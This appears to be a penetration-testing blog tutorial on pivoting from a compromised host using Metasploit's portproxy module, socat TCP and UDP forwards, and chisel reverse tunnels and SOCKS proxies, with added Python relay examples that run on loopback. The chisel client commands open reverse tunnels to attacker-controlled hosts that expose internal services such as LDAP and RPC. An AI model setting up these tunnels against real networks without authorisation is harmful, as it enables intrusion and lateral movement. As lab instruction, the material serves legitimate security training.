Metasploit: Portproxy (tunneling a meterpreter session inside another meterpreter session) + socat + chisel
Hi readers, here we will see how to get a reverse meterpreter shell from an internal machine (one that is not connected to the internet). For more context, this article is best read after the previous one (https://pswalia2u.medium.com/pivoting-metasploit-proxychains-85d18ce5bf2d).
Prerequisites:
An already compromised system (the pivot) with a meterpreter session, and autoroute already configured for the next machine (10.100.11.100).
Network architecture:
1. Setting up the portproxy module:
2. Exploiting a vulnerability and configuring the exploit module:
Here we have exploited an Apache Tomcat server (the payload was uploaded via the Tomcat Manager) running on port 8443 on our target (10.100.11.100).
3. Networking info for better understanding:
a. Attacker:
b. Pivot Machine:
c. Target:
Note: the portproxy module (post/windows/manage/portproxy, which sets up the forward with Windows' own netsh interface portproxy) only works when the pivot is a Windows machine. On a Unix/Linux pivot I prefer socat for forwarding TCP traffic to a specific IP (socat must be installed on the pivot for this to work).
socat TCP-LISTEN:8888,fork TCP:172.16.40.9:8889
Here any TCP traffic arriving on 0.0.0.0:8888 (every interface of the pivot) is forwarded to 172.16.40.9 on port 8889. The fork option matters: without it socat serves a single connection and then exits; with it every incoming connection is handled by its own child process, so several sessions can use the forward at once.
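The forward above, reproduced on the loopback interface so it can be run anywhere: this is an added Python example, not code from the original post or from socat, with the same listen/fork/connect behaviour as the socat line (one handler per accepted connection, bytes relayed in both directions until each side reaches EOF). The echo server stands in for the internal service at 172.16.40.9:8889 and is constructed for the demo; port 0 lets the OS pick free ports.

```python
"""Minimal equivalent of `socat TCP-LISTEN:<lport>,fork TCP:<rhost>:<rport>`.
Added example, not code from the original post or from socat: every accepted
connection gets its own thread (socat's fork) and a pair of pumps relays
bytes in both directions until each side reaches EOF."""
import socket
import threading


def _pump(src, dst):
    """Copy bytes src -> dst until src reaches EOF, then half-close dst."""
    try:
        while True:
            chunk = src.recv(4096)
            if not chunk:
                break
            dst.sendall(chunk)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)  # pass the EOF on, keep the other direction open
        except OSError:
            pass


def _serve_connection(client, target):
    """One forwarded connection: dial the target, then relay both ways."""
    try:
        upstream = socket.create_connection(target, timeout=5)
    except OSError:
        client.close()  # target unreachable: drop the client, as socat would
        return
    upstream.settimeout(None)
    back = threading.Thread(target=_pump, args=(upstream, client), daemon=True)
    back.start()
    _pump(client, upstream)
    back.join()
    client.close()
    upstream.close()


def start_forwarder(listen_host, listen_port, target_host, target_port):
    """Listen on listen_host:listen_port and forward every connection to
    target_host:target_port. Returns the bound port (useful with port 0)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((listen_host, listen_port))
    srv.listen(16)

    def accept_loop():
        while True:
            conn, _ = srv.accept()
            threading.Thread(target=_serve_connection,
                             args=(conn, (target_host, target_port)), daemon=True).start()

    threading.Thread(target=accept_loop, daemon=True).start()
    return srv.getsockname()[1]


def start_echo_server(host="127.0.0.1", port=0):
    """Constructed stand-in for the internal service (172.16.40.9:8889 in the
    article): echoes everything back and closes once the client half-closes."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind((host, port))
    srv.listen(16)

    def echo(conn):
        with conn:
            while True:
                chunk = conn.recv(4096)
                if not chunk:
                    break
                conn.sendall(chunk)

    def accept_loop():
        while True:
            conn, _ = srv.accept()
            threading.Thread(target=echo, args=(conn,), daemon=True).start()

    threading.Thread(target=accept_loop, daemon=True).start()
    return srv.getsockname()[1]


def roundtrip(host, port, payload):
    """Connect through the forwarder, send, half-close, collect the echo."""
    with socket.create_connection((host, port), timeout=5) as s:
        s.sendall(payload)
        s.shutdown(socket.SHUT_WR)
        received = b""
        while True:
            chunk = s.recv(4096)
            if not chunk:
                break
            received += chunk
    return received


if __name__ == "__main__":
    service = start_echo_server()
    entry = start_forwarder("127.0.0.1", 0, "127.0.0.1", service)
    print(roundtrip("127.0.0.1", entry, b"hello through the pivot"))
```

The half-close in _pump is the detail that makes this behave like socat: when one side finishes sending, only that direction is shut down, so the service can still flush its reply before the forwarder tears the pair down.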
We can do the same thing with chisel (the chisel binary needs to be transferred to the pivot):
CHISEL (https://github.com/jpillora/chisel):
Port forwarding-
1. On the local attacker's kali box (10.10.14.23) we start a chisel server listening on port 8888, with --reverse so that clients are allowed to open reverse tunnels:
./chisel server -p 8888 --reverse
2. On the machine where we need to do the forwarding (172.17.0.6) we start a chisel client, specifying the server (10.10.14.23:8888) and the remote machine (172.17.0.4:3000) to which traffic must be forwarded:
./chisel client 10.10.14.23:8888 R:3000:172.17.0.4:3000
On the server side we can check that the chisel server has started listening on 127.0.0.1:3000.
Our tunnel has been set up successfully. Now any traffic sent to 127.0.0.1:3000 on 10.10.14.23 travels back through the chisel tunnel to the client on 172.17.0.6, which delivers it to 172.17.0.4:3000.
SOCKS Proxy-
1. Start the chisel server on the kali box:
chisel server -p 1433 --reverse
2. Start the chisel client on the pivot box:
./chisel64 client 192.168.119.156:1433 R:socks
3. Check that the SOCKS server was created on the kali box. With R:socks, chisel opens a SOCKS5 listener on the server side, on port 1080 by default; proxychains can be pointed at it to reach the pivot's internal network, as in the previous article.
Lab details:
INE LAB 19 (Leveraging PowerShell During Exploitation)
Exposing LDAP via chisel:
chisel server -p 8001 --reverse
./chisel64 client 10.10.14.35:8001 R:389:127.0.0.1:389
Here 127.0.0.1:389 is LDAP as reached from the pivot itself, and it becomes reachable on port 389 of the attacker box 10.10.14.35. Binding a port below 1024 on the attacker side requires root, so run the chisel server as root or pick a high local port (for example R:3389:127.0.0.1:389).
Exposing RPC port 111 (forwarding UDP with socat):
The datagrams are carried over a TCP connection between the two hosts and converted back to UDP at each end.
Server side (on the pivot 9.42.116.123, which can reach the target 10.254.100.58; listens on TCP 5353 and sends whatever arrives as UDP datagrams to the target's port 111):
socat tcp4-listen:5353,reuseaddr,fork UDP:10.254.100.58:111
Client side (on the attacker box; listens on local UDP 111 and pushes each datagram over TCP to the pivot's port 5353, so a UDP query to 127.0.0.1:111 on the attacker reaches the target's portmapper):
socat udp4-listen:111,reuseaddr,fork tcp:9.42.116.123:5353
Caveat: socat copies raw bytes, so datagram boundaries are not preserved on the TCP leg. This works for small request/response exchanges such as portmapper queries, but large UDP payloads can be split or merged. Binding UDP 111 on the attacker box also needs root.
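The two socat commands above as one runnable pair on the loopback interface: an added Python example, not code from the original post or from socat. The pivot side plays the article's "server side" (TCP in, UDP out to the target), the attacker side plays its "client side" (a local UDP port, TCP out to the pivot). One deliberate difference from socat: every datagram is prefixed with a 2-byte length on the TCP leg, so TCP cannot split or merge it, which is exactly the caveat noted above. The UDP echo server is a constructed stand-in for the target's portmapper; ports are chosen by the OS (port 0), so nothing needs root.

```python
"""UDP-over-TCP relay pair mirroring the two socat commands above. Added
example, not code from the original post or from socat: pivot side = the
article's "server side", attacker side = its "client side". Unlike socat,
each datagram gets a 2-byte length prefix so TCP cannot split or merge it."""
import socket
import struct
import threading

def _recv_exact(sock, n):
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            return None  # peer closed mid-frame
        buf += chunk
    return buf

def send_frame(sock, data):
    """2-byte big-endian length + payload; an empty frame means 'no answer'."""
    sock.sendall(struct.pack("!H", len(data)) + data)

def recv_frame(sock):
    hdr = _recv_exact(sock, 2)
    return None if hdr is None else _recv_exact(sock, struct.unpack("!H", hdr)[0])

def start_pivot_relay(listen_host, listen_port, udp_target, reply_timeout=2.0):
    """Pivot side: each frame becomes a datagram to udp_target; first reply (or empty frame) goes back."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((listen_host, listen_port))
    srv.listen(16)

    def handle(conn):
        udp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        udp.settimeout(reply_timeout)
        with conn, udp:
            while True:
                frame = recv_frame(conn)
                if frame is None:
                    break
                udp.sendto(frame, udp_target)
                try:
                    reply, _ = udp.recvfrom(65535)
                except socket.timeout:
                    reply = b""  # keep the attacker side from blocking forever
                send_frame(conn, reply)

    def accept_loop():
        while True:
            conn, _ = srv.accept()
            threading.Thread(target=handle, args=(conn,), daemon=True).start()

    threading.Thread(target=accept_loop, daemon=True).start()
    return srv.getsockname()[1]

def start_attacker_relay(listen_host, listen_port, pivot_tcp):
    """Attacker side: local UDP port; one TCP connection per UDP peer (what socat's fork gives you)."""
    udp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    udp.bind((listen_host, listen_port))
    conns = {}

    def loop():
        while True:
            data, peer = udp.recvfrom(65535)
            conn = conns.get(peer)
            if conn is None:
                conn = conns[peer] = socket.create_connection(pivot_tcp, timeout=5)
            send_frame(conn, data)
            reply = recv_frame(conn)
            if reply is None:  # pivot closed the connection: forget it
                conns.pop(peer, None)
            elif reply:
                udp.sendto(reply, peer)

    threading.Thread(target=loop, daemon=True).start()
    return udp.getsockname()[1]

def start_udp_echo_server(host="127.0.0.1", port=0):
    """Constructed stand-in for the UDP service on the target (port 111)."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.bind((host, port))

    def loop():
        while True:
            data, peer = sock.recvfrom(65535)
            sock.sendto(data, peer)

    threading.Thread(target=loop, daemon=True).start()
    return sock.getsockname()[1]

def udp_query(host, port, payload, timeout=5.0):
    """One datagram in, one reply out, like a portmapper query from the attacker box."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(payload, (host, port))
        reply, _ = s.recvfrom(65535)
    return reply
```

To try it, start the echo server, then the pivot relay pointed at it, then the attacker relay pointed at the pivot, and send a datagram to the attacker relay's port with udp_query; the reply comes back through both hops. The empty-frame convention is what keeps the attacker side from hanging when the target drops a packet, a failure socat's raw-byte version simply stalls on.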
Thanks for reading!
Author: Prabhsimran (https://www.linkedin.com/in/pswalia2u/)